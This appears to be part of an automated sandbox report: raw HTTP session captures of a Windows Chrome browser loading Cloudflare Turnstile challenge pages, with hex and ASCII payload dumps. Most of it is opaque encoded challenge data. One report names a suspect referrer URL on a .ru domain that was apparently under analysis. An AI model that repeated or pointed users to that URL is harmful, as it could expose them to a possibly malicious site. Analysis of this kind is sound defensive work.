                                                                                                                          Access-Control-Request-Method: POST
                                                                                                                          Access-Control-Request-Headers: content-type
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:09:15 UTC336INHTTP/1.1 200 OK
                                                                                                                          Content-Length: 0
                                                                                                                          access-control-max-age: 86400
                                                                                                                          access-control-allow-methods: OPTIONS, POST
                                                                                                                          access-control-allow-origin: *
                                                                                                                          access-control-allow-headers: content-type, content-length
                                                                                                                          date: Thu, 19 Dec 2024 16:09:14 GMT
                                                                                                                          Via: 1.1 google
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          55192.168.2.1649798104.18.95.414437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:09:16 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/2106713247:1734621222:Ju1S4rINYs2w6jhaMJAc6wI0nSHHPD5uYn3o5b92WHs/8f48a7cc7ace41d9/.H3W3k_QuubbPTTWkYw5VKDIKNmMDBqT.SjUBhnSxnM-1734624549-1.1.1.1-Nr6MbTJA2B5hNY5I5gYF2L0m47RDXC_3R6cVJGZX96s5UAuGLPsnAnpIY.IFyYCK HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:09:16 UTC379INHTTP/1.1 404 Not Found
                                                                                                                          Date: Thu, 19 Dec 2024 16:09:16 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Content-Length: 7
                                                                                                                          Connection: close
                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                          cf-chl-out: MPI97tjJFVJu5SLtfWOVu3RcMHyLZ4GPkcg=$F2I4+nl/0IS8B/hW
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8f48a7f61e0e4259-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-12-19 16:09:16 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                          Data Ascii: invalid


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          56192.168.2.164979935.190.80.14437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:09:16 UTC482OUTPOST /report/v4?s=wnW%2BGYblX0Kzjphj1%2F0sP%2BY%2FLrMq%2FJuzzxlY%2FXCUapaLm0ujBdHHn0RySUC68qWD4tqzWYDFrUcvc1NMsLhZGdmyw8pFXgJqiM2S1qDotNZyr5WlboOoTG0necTOLg%3D%3D HTTP/1.1
                                                                                                                          Host: a.nel.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Content-Length: 429
                                                                                                                          Content-Type: application/reports+json
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:09:16 UTC429OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 38 38 35 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 77 76 2e 69 74 7a 72 61 74 65 72 62 69 2e 72 75 2f 78 78 41 42 57 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 36 33 2e 31 31 38 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22
                                                                                                                          Data Ascii: [{"age":0,"body":{"elapsed_time":885,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://wv.itzraterbi.ru/xxABW/","sampling_fraction":1.0,"server_ip":"172.67.163.118","status_code":404,"type":"http.error"},"type":"network-error"
                                                                                                                          2024-12-19 16:09:16 UTC168INHTTP/1.1 200 OK
                                                                                                                          Content-Length: 0
                                                                                                                          date: Thu, 19 Dec 2024 16:09:16 GMT
                                                                                                                          Via: 1.1 google
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          57192.168.2.1649800104.18.95.414437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:09:16 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/8f48a7cc7ace41d9/1734624554139/28f5dfd92c7a87d8b384f9284867ff6c9c89fbcf047d033749d17a32e7b13ad4/u-dMlLpykfFXl6l HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/5cyl9/0x4AAAAAAA1mMrsCS61Fknnw/auto/fbE/normal/auto/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:09:16 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                          Date: Thu, 19 Dec 2024 16:09:16 GMT
                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                          Content-Length: 1
                                                                                                                          Connection: close
                                                                                                                          2024-12-19 16:09:16 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 4b 50 58 66 32 53 78 36 68 39 69 7a 68 50 6b 6f 53 47 66 5f 62 4a 79 4a 2d 38 38 45 66 51 4d 33 53 64 46 36 4d 75 65 78 4f 74 51 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                          Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gKPXf2Sx6h9izhPkoSGf_bJyJ-88EfQM3SdF6MuexOtQAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                          2024-12-19 16:09:16 UTC1INData Raw: 4a
                                                                                                                          Data Ascii: J


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          58192.168.2.1649801104.18.95.414437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:09:18 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/8f48a7cc7ace41d9/1734624554141/BQm20Mq890_P8mZ HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/5cyl9/0x4AAAAAAA1mMrsCS61Fknnw/auto/fbE/normal/auto/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:09:18 UTC200INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 19 Dec 2024 16:09:18 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Content-Length: 61
                                                                                                                          Connection: close
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8f48a8039d13c34b-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-12-19 16:09:18 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5e 00 00 00 05 08 02 00 00 00 43 f9 cc 0d 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                          Data Ascii: PNGIHDR^CIDAT$IENDB`


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          59192.168.2.1649803104.18.95.414437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:09:20 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8f48a7cc7ace41d9/1734624554141/BQm20Mq890_P8mZ HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:09:20 UTC200INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 19 Dec 2024 16:09:20 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Content-Length: 61
                                                                                                                          Connection: close
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8f48a80eaca6f791-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-12-19 16:09:20 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5e 00 00 00 05 08 02 00 00 00 43 f9 cc 0d 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                          Data Ascii: PNGIHDR^CIDAT$IENDB`


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          60192.168.2.1649804104.18.95.414437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:09:20 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/2106713247:1734621222:Ju1S4rINYs2w6jhaMJAc6wI0nSHHPD5uYn3o5b92WHs/8f48a7cc7ace41d9/.H3W3k_QuubbPTTWkYw5VKDIKNmMDBqT.SjUBhnSxnM-1734624549-1.1.1.1-Nr6MbTJA2B5hNY5I5gYF2L0m47RDXC_3R6cVJGZX96s5UAuGLPsnAnpIY.IFyYCK HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Content-Length: 31227
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          Content-type: application/x-www-form-urlencoded
                                                                                                                          CF-Chl-RetryAttempt: 0
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          CF-Challenge: .H3W3k_QuubbPTTWkYw5VKDIKNmMDBqT.SjUBhnSxnM-1734624549-1.1.1.1-Nr6MbTJA2B5hNY5I5gYF2L0m47RDXC_3R6cVJGZX96s5UAuGLPsnAnpIY.IFyYCK
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Origin: https://challenges.cloudflare.com
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/5cyl9/0x4AAAAAAA1mMrsCS61Fknnw/auto/fbE/normal/auto/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:09:20 UTC16384OUTData Raw: 76 5f 38 66 34 38 61 37 63 63 37 61 63 65 34 31 64 39 3d 52 73 6e 50 43 7a 54 5a 75 25 32 62 73 54 75 56 5a 54 42 65 67 65 6c 56 71 54 41 52 54 38 65 62 6d 50 6b 45 7a 33 65 6e 6d 50 65 73 46 4b 65 67 65 74 6e 46 2b 65 63 76 4c 65 46 44 50 54 69 65 38 50 6b 6e 6e 6e 49 71 65 71 58 65 79 50 2b 5a 6b 6e 65 2b 6e 65 55 65 7a 75 54 46 65 56 31 56 74 63 4b 65 54 49 65 42 50 56 49 65 55 56 46 65 65 42 65 31 69 5a 34 4f 65 65 75 43 30 48 65 74 69 5a 68 6b 50 51 4a 62 37 2b 30 7a 65 65 74 48 65 52 75 50 33 2b 6e 65 59 47 44 65 4a 50 65 42 63 50 7a 42 6e 6a 56 4c 65 71 73 65 37 43 56 69 48 67 78 61 6a 44 65 6a 6f 43 78 48 49 4e 78 6a 71 75 69 31 65 51 6f 75 33 78 46 6a 6d 71 6c 48 6f 64 7a 32 65 2b 24 52 71 4b 31 56 64 7a 62 6d 6d 44 7a 30 52 62 39 4c 51 5a 70 47
                                                                                                                          Data Ascii: v_8f48a7cc7ace41d9=RsnPCzTZu%2bsTuVZTBegelVqTART8ebmPkEz3enmPesFKegetnF+ecvLeFDPTie8PknnnIqeqXeyP+Zkne+neUezuTFeV1VtcKeTIeBPVIeUVFeeBe1iZ4OeeuC0HetiZhkPQJb7+0zeetHeRuP3+neYGDeJPeBcPzBnjVLeqse7CViHgxajDejoCxHINxjqui1eQou3xFjmqlHodz2e+$RqK1VdzbmmDz0Rb9LQZpG
                                                                                                                          2024-12-19 16:09:20 UTC14843OUTData Raw: 53 70 57 58 59 54 44 54 6f 65 4c 65 39 65 56 73 2b 45 46 67 65 48 65 61 65 51 44 39 50 65 4b 65 31 65 7a 6f 46 63 65 4e 50 6b 61 61 55 4c 53 65 6e 6e 7a 6f 65 73 50 4a 47 46 69 65 69 50 2b 75 65 30 65 64 65 52 75 46 37 65 55 75 65 6f 7a 42 65 52 50 78 6f 7a 6b 65 72 50 2b 73 65 4e 65 41 53 43 65 71 50 65 6c 53 6d 57 73 57 34 69 65 6b 50 7a 6f 65 6b 65 6e 45 65 2b 65 61 65 51 5a 54 45 65 39 65 7a 6f 65 4c 65 5a 65 56 34 46 74 65 38 50 4a 24 6a 44 54 44 50 33 6e 54 2b 6e 5a 65 30 75 7a 62 50 6e 65 31 75 7a 37 65 2d 50 56 65 54 75 54 38 58 54 50 78 4d 50 55 50 7a 65 65 54 45 55 44 7a 71 54 58 65 34 73 7a 65 46 75 48 6f 36 46 65 46 34 65 6f 65 2b 4c 7a 69 54 74 7a 65 75 56 33 54 5a 50 30 75 71 32 34 75 71 54 75 78 77 54 4c 50 5a 75 78 69 54 4c 50 59 6e 65 37
                                                                                                                          Data Ascii: SpWXYTDToeLe9eVs+EFgeHeaeQD9PeKe1ezoFceNPkaaULSennzoesPJGFieiP+ue0edeRuF7eUueozBeRPxozkerP+seNeASCeqPelSmWsW4iekPzoekenEe+eaeQZTEe9ezoeLeZeV4Fte8PJ$jDTDP3nT+nZe0uzbPne1uz7e-PVeTuT8XTPxMPUPzeeTEUDzqTXe4szeFuHo6FeF4eoe+LziTtzeuV3TZP0uq24uqTuxwTLPZuxiTLPYne7
                                                                                                                          2024-12-19 16:09:21 UTC330INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 19 Dec 2024 16:09:20 GMT
                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                          Content-Length: 26284
                                                                                                                          Connection: close
                                                                                                                          cf-chl-gen: PZ0klmzgBvQ2IC/H4UkqESxgUEMuDTNWO3EdBO/AvSq7IbrlJ+7Cmyes9vrebMvShntzC215cOGrAFin$xbicTtFUEhVUPsDR
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8f48a80f9c3442f5-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-12-19 16:09:21 UTC1039INData Raw: 72 36 71 61 6e 59 75 71 6f 4b 79 35 76 62 61 79 77 36 65 54 6e 73 57 31 77 49 69 43 7a 6f 6d 4d 68 73 4f 71 70 71 33 48 75 71 36 6e 6e 4d 69 73 6e 4c 62 64 32 4c 7a 58 31 62 7a 44 74 73 43 39 79 36 66 70 6f 63 4c 4d 79 76 48 43 35 73 62 76 7a 50 6a 76 2b 74 66 51 30 50 6d 79 2f 76 65 31 30 51 48 79 78 67 50 6c 2f 65 66 47 2b 65 48 34 77 74 76 6e 43 51 50 6c 39 68 4c 6c 47 4f 4c 79 31 68 73 49 38 76 55 69 32 78 6f 63 2b 50 54 35 42 69 76 6a 47 67 67 67 4a 43 66 71 35 2f 30 4d 37 2b 63 6b 4a 66 51 6d 38 44 6f 50 46 53 30 4e 39 6a 6f 5a 50 6a 63 2b 4d 7a 34 70 43 41 68 4e 44 54 73 33 47 67 63 6d 52 55 77 7a 44 43 34 50 4f 68 51 54 56 31 6c 64 4d 6c 59 63 47 6b 34 36 51 42 35 41 51 55 52 65 54 44 35 48 53 6b 56 47 57 6e 45 77 4c 48 42 51 55 54 56 49 4c 47 31
                                                                                                                          Data Ascii: r6qanYuqoKy5vbayw6eTnsW1wIiCzomMhsOqpq3Huq6nnMisnLbd2LzX1bzDtsC9y6fpocLMyvHC5sbvzPjv+tfQ0Pmy/ve10QHyxgPl/efG+eH4wtvnCQPl9hLlGOLy1hsI8vUi2xoc+PT5BivjGgggJCfq5/0M7+ckJfQm8DoPFS0N9joZPjc+Mz4pCAhNDTs3GgcmRUwzDC4POhQTV1ldMlYcGk46QB5AQUReTD5HSkVGWnEwLHBQUTVILG1
                                                                                                                          2024-12-19 16:09:21 UTC1369INData Raw: 48 75 4b 79 75 6a 4c 32 76 78 5a 7a 47 6a 71 4f 78 79 74 65 57 30 5a 4c 58 72 4c 36 32 71 64 57 2f 77 72 50 6c 78 71 57 32 36 4d 75 68 77 65 37 6e 34 4c 7a 76 73 63 4c 48 39 73 76 41 36 75 33 46 35 66 6e 51 39 4c 58 65 2b 2b 2f 61 75 39 37 69 30 73 58 48 77 76 50 67 37 73 41 4e 37 51 6e 76 36 2b 44 56 42 76 66 6a 31 68 59 58 48 76 55 51 36 67 38 62 39 2b 45 6b 41 76 6f 66 38 2f 7a 30 48 69 7a 6a 43 66 73 66 41 79 4d 69 4c 43 48 2b 47 66 58 78 41 7a 49 50 4e 52 6f 55 48 78 34 51 39 54 59 75 4f 68 49 55 43 76 77 63 47 7a 77 71 54 43 64 46 54 51 73 66 49 30 74 53 4b 67 77 35 46 44 49 2b 50 42 34 39 59 6a 5a 55 49 44 6b 33 5a 57 63 33 48 55 52 6a 57 6a 6c 52 62 30 4e 41 4e 47 41 32 4c 54 46 48 4d 30 68 4c 61 56 6c 7a 61 44 6b 2b 58 33 70 54 63 57 4e 6b 69 49
                                                                                                                          Data Ascii: HuKyujL2vxZzGjqOxyteW0ZLXrL62qdW/wrPlxqW26Muhwe7n4LzvscLH9svA6u3F5fnQ9LXe++/au97i0sXHwvPg7sAN7Qnv6+DVBvfj1hYXHvUQ6g8b9+EkAvof8/z0HizjCfsfAyMiLCH+GfXxAzIPNRoUHx4Q9TYuOhIUCvwcGzwqTCdFTQsfI0tSKgw5FDI+PB49YjZUIDk3ZWc3HURjWjlRb0NANGA2LTFHM0hLaVlzaDk+X3pTcWNkiI
                                                                                                                          2024-12-19 16:09:21 UTC1369INData Raw: 78 4b 43 74 72 37 58 56 6c 62 4c 58 31 61 36 70 78 37 72 57 71 4c 72 55 74 38 57 34 35 73 4f 35 30 39 33 57 34 73 36 67 77 66 43 73 72 63 6a 7a 38 38 76 4d 38 75 6e 6c 38 4d 53 36 78 72 69 35 74 39 62 76 33 64 58 35 33 65 6a 78 79 4e 6a 61 39 75 4d 41 36 78 44 6a 33 73 6f 44 34 52 4d 42 30 63 7a 36 31 38 2f 35 38 42 45 67 45 52 73 51 2f 52 38 70 34 76 49 41 49 52 58 35 39 75 45 4b 48 68 49 7a 4a 51 45 47 46 69 6f 32 4e 44 63 46 43 67 30 49 39 6a 67 30 44 52 55 56 41 68 4e 47 4e 52 38 65 4e 6b 4d 58 4f 55 59 6a 56 44 4d 6b 4c 31 59 30 4f 43 31 63 46 55 73 35 56 54 6c 51 54 31 67 65 51 6b 63 79 51 43 45 7a 4e 6d 31 4e 62 57 39 6b 50 55 42 42 63 33 59 32 55 6a 5a 71 56 6a 4a 33 64 56 68 56 59 48 42 65 63 31 52 42 50 6c 56 5a 58 59 5a 64 67 6a 39 41 65 6d 4f
                                                                                                                          Data Ascii: xKCtr7XVlbLX1a6px7rWqLrUt8W45sO5093W4s6gwfCsrcjz88vM8unl8MS6xri5t9bv3dX53ejxyNja9uMA6xDj3soD4RMB0cz618/58BEgERsQ/R8p4vIAIRX59uEKHhIzJQEGFio2NDcFCg0I9jg0DRUVAhNGNR8eNkMXOUYjVDMkL1Y0OC1cFUs5VTlQT1geQkcyQCEzNm1NbW9kPUBBc3Y2UjZqVjJ3dVhVYHBec1RBPlVZXYZdgj9AemO
                                                                                                                          2024-12-19 16:09:21 UTC1369INData Raw: 36 61 75 75 63 72 4d 79 4d 79 39 6e 74 57 72 7a 72 6e 52 75 4f 66 47 6f 4f 75 37 34 74 32 74 33 76 43 36 33 61 37 41 30 36 36 33 39 2f 69 33 32 38 62 31 37 72 72 61 2b 50 50 42 31 67 62 68 35 65 62 63 35 51 33 68 33 4f 41 4d 30 50 76 74 38 74 44 66 36 4f 6f 49 30 42 58 73 39 75 6b 56 37 66 72 63 44 75 50 68 49 69 6a 32 38 77 67 69 35 53 51 6f 35 4f 2f 34 37 66 76 38 43 77 77 45 37 2f 59 4a 44 69 6e 31 47 54 49 52 4e 42 38 57 2f 44 73 46 4e 68 30 58 46 79 77 45 47 51 63 2f 47 43 38 38 54 52 35 43 51 30 38 77 56 44 4a 61 52 6a 74 54 57 45 39 66 53 30 4a 43 49 55 64 46 50 7a 4e 54 4f 57 78 6d 56 69 68 6e 4d 46 4a 6e 53 56 4a 65 56 57 64 31 57 6b 6c 49 4f 33 39 6f 56 47 74 61 64 56 6c 2f 4f 48 4a 46 64 58 39 45 61 30 31 4a 52 56 70 67 61 57 79 45 63 5a 65 55
                                                                                                                          Data Ascii: 6auucrMyMy9ntWrzrnRuOfGoOu74t2t3vC63a7A06639/i328b17rra+PPB1gbh5ebc5Q3h3OAM0Pvt8tDf6OoI0BXs9ukV7frcDuPhIij28wgi5SQo5O/47fv8CwwE7/YJDin1GTIRNB8W/DsFNh0XFywEGQc/GC88TR5CQ08wVDJaRjtTWE9fS0JCIUdFPzNTOWxmVihnMFJnSVJeVWd1WklIO39oVGtadVl/OHJFdX9Ea01JRVpgaWyEcZeU
                                                                                                                          2024-12-19 16:09:21 UTC1369INData Raw: 53 79 75 39 43 35 72 4e 50 57 78 37 54 41 35 65 66 6d 33 72 2f 6b 72 63 66 6b 35 75 50 71 73 50 54 46 2b 4c 54 69 79 39 61 34 37 38 34 42 30 65 33 52 76 50 57 38 76 74 37 44 39 2f 4d 46 44 73 6e 59 32 4f 58 6c 30 41 7a 66 36 65 4d 53 35 2b 34 54 36 50 33 34 32 69 4c 38 36 69 49 5a 42 78 51 5a 34 52 77 65 34 52 62 36 44 76 67 65 42 50 41 49 4e 65 34 49 4b 77 72 35 43 51 63 34 4f 44 35 41 44 44 59 41 4c 43 4d 6a 4a 69 49 42 53 54 38 74 50 77 6f 6b 4b 69 34 6e 4f 7a 45 78 4a 30 30 31 4a 6a 64 5a 4e 55 38 33 4f 7a 77 2f 58 52 78 41 4e 45 4e 6a 51 6a 55 69 5a 45 52 4c 59 43 74 52 5a 45 64 55 58 6b 52 58 55 47 46 56 54 31 46 6f 54 46 63 34 59 54 68 6a 61 32 78 53 58 34 4e 67 65 32 64 2b 62 55 52 6a 69 58 47 43 68 56 35 74 64 49 46 75 67 6e 68 7a 6a 34 64 37 57
                                                                                                                          Data Ascii: Syu9C5rNPWx7TA5efm3r/krcfk5uPqsPTF+LTiy9a4784B0e3RvPW8vt7D9/MFDsnY2OXl0Azf6eMS5+4T6P342iL86iIZBxQZ4Rwe4Rb6DvgeBPAINe4IKwr5CQc4OD5ADDYALCMjJiIBST8tPwokKi4nOzExJ001JjdZNU83Ozw/XRxANENjQjUiZERLYCtRZEdUXkRXUGFVT1FoTFc4YThja2xSX4Nge2d+bURjiXGChV5tdIFugnhzj4d7W
                                                                                                                          2024-12-19 16:09:21 UTC1369INData Raw: 57 31 72 6d 2b 74 64 4b 72 32 4d 53 75 76 72 6d 73 72 4d 66 6b 36 76 62 4a 35 37 54 35 7a 2f 71 30 75 64 49 41 76 4e 66 58 33 67 51 41 75 64 4c 36 78 4d 63 4b 2f 76 76 4a 44 41 63 46 35 65 6f 50 44 39 45 56 35 41 58 59 38 75 30 56 32 76 6b 62 32 74 37 61 33 42 48 32 47 68 51 72 2f 52 72 39 4a 2f 34 69 2f 54 54 2b 45 43 51 30 42 79 66 77 4f 67 38 48 4f 2f 6b 53 46 78 55 7a 2f 44 55 68 4e 41 51 4a 43 41 55 49 53 6a 77 33 45 44 30 70 45 79 4d 65 45 52 45 73 53 55 39 62 4c 6b 77 5a 58 6a 52 66 47 52 34 33 5a 43 45 38 50 45 4e 6f 5a 42 35 43 4c 46 73 71 4f 30 70 70 4c 33 46 4a 5a 44 4a 32 5a 7a 4a 4b 65 6c 31 77 4e 6c 71 41 62 31 6d 47 56 6e 35 48 65 59 42 33 59 47 68 69 5a 47 5a 62 55 58 39 66 63 47 4b 52 61 6b 2b 4c 69 46 61 5a 6a 35 39 62 64 6c 32 56 58 61
                                                                                                                          Data Ascii: W1rm+tdKr2MSuvrmsrMfk6vbJ57T5z/q0udIAvNfX3gQAudL6xMcK/vvJDAcF5eoPD9EV5AXY8u0V2vkb2t7a3BH2GhQr/Rr9J/4i/TT+ECQ0ByfwOg8HO/kSFxUz/DUhNAQJCAUISjw3ED0pEyMeEREsSU9bLkwZXjRfGR43ZCE8PENoZB5CLFsqO0ppL3FJZDJ2ZzJKel1wNlqAb1mGVn5HeYB3YGhiZGZbUX9fcGKRak+LiFaZj59bdl2VXa
